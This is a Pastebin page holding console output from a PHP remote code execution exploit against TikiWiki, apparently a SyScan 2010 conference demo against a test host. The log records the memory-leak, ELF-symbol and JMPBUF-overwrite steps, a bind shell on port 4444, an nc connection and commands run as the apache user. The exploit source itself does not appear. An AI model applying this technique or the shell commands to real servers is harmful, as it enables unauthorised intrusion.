This week only. Pastebin PRO Accounts Christmas Special! Don't miss out!Want more features on Pastebin? Sign Up, it's FREE!
Guest

SyScan 2010 - PHP 0-day

By: a guest on Jun 17th, 2010  |  syntax: None  |  size: 2.11 KB  |  views: 4,631  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. $ ./exploit.py -h http://t.testsystem/
  2. PHP xxx() Remote Code Execution Exploit (TikiWiki Version)
  3. Copyright (C) 2010 Stefan Esser/SektionEins GmbH
  4.                            *** DO NOT DISTRIBUTE ***
  5.  
  6. [+] Connecting to determine wordsize
  7. [+] Wordsize is 32 bit
  8. [+] Connecting to determine PHP 5.2.x vs. PHP 5.3.x
  9. [+] PHP version is 5.3.x
  10. [+] Connecting to determine XXX version
  11. [+] PHP version >= 5.3.2
  12. [+] Determining endianess of system
  13. [+] System is little endian
  14. [+] Leaking address of std_object_handlers
  15. [+] Found std_object_handlers address to be 0xb76e84a0
  16. [+] Leaking std_object_handlers
  17. [+] Retrieved std_object_handlers (0xb75b5c60, 0xb75b6230, 0xb75b2300, 0xb75b4c70, 0xb75b52f0, 0xb75b3fc0, 0xb75b42b0, 0xb75b4430, 0x00000000, 0x00000000, 0xb75b3c60, 0xb75b4a40, 0xb75b57a0, 0xb75b4170, 0xb75b27d0, 0xb75b4f00, 0x00000000, 0xb75b28a0, 0xb75b27a0, 0xb75b2af0, 0xb75b2830, 0xb75b46b0, 0x00000000, 0x00000000, 0xb75b2be0)
  18. [+] Optimized to 0xb74008f0
  19. [+] Scanning for executable header
  20. [+] ELF header found at 0xb73ab000
  21. [+] Retrieving and parsing ELF header
  22. [+] Retrieving program headers
  23. [+] Retrieving ELF string table
  24. [+] Looking up ELF symbol: executor_globals
  25. [+] Found executor_globals at 0xb76fe280
  26. [+] Looking up ELF symbol: php_execute_script
  27. [+] Found php_execute_script at 0xb75386c0
  28. [+] Looking up ELF symbol: zend_eval_string
  29. [+] Found zend_eval_string at 0xb7586580
  30. [+] Searching JMPBUF in executor_globals
  31. [+] Found JMPBUF at 0xbfcc64b4
  32. [+] Attempt to crack JMPBUF
  33. [+] Determined stored EIP value 0xb753875a from pattern match
  34. [+] Calculated XORER 0x68ab06ea
  35. [+] Unmangled stored ESP is 0xbfcc5470
  36. [+] Checking memory infront of JMPBUF for overwriting possibilities
  37. [+] Found 0x28 at 0xbfcc6498 (0x3e4) using it as overwrite trampoline
  38. [+] Returning into PHP... Spawning a shell at port 4444
  39.  
  40. ...
  41. $ nc t.testsystem 4444
  42. Welcome to the PHPShell 5/22/2010 1:27 am
  43.  
  44. system("uname -a");
  45. Linux fedora13x86 2.6.33.4-95.fc13.i686.PAE #1 SMP Thu May 13 05:38:26 UTC 2010 i686 i686 i386 GNU/Linux
  46. system("id");
  47. uid=48(apache) gid=484(apache) groups=484(apache) context=unconfined_u:system_r:httpd_t:s0
  48.        
  49. ...
clone this paste RAW Paste Data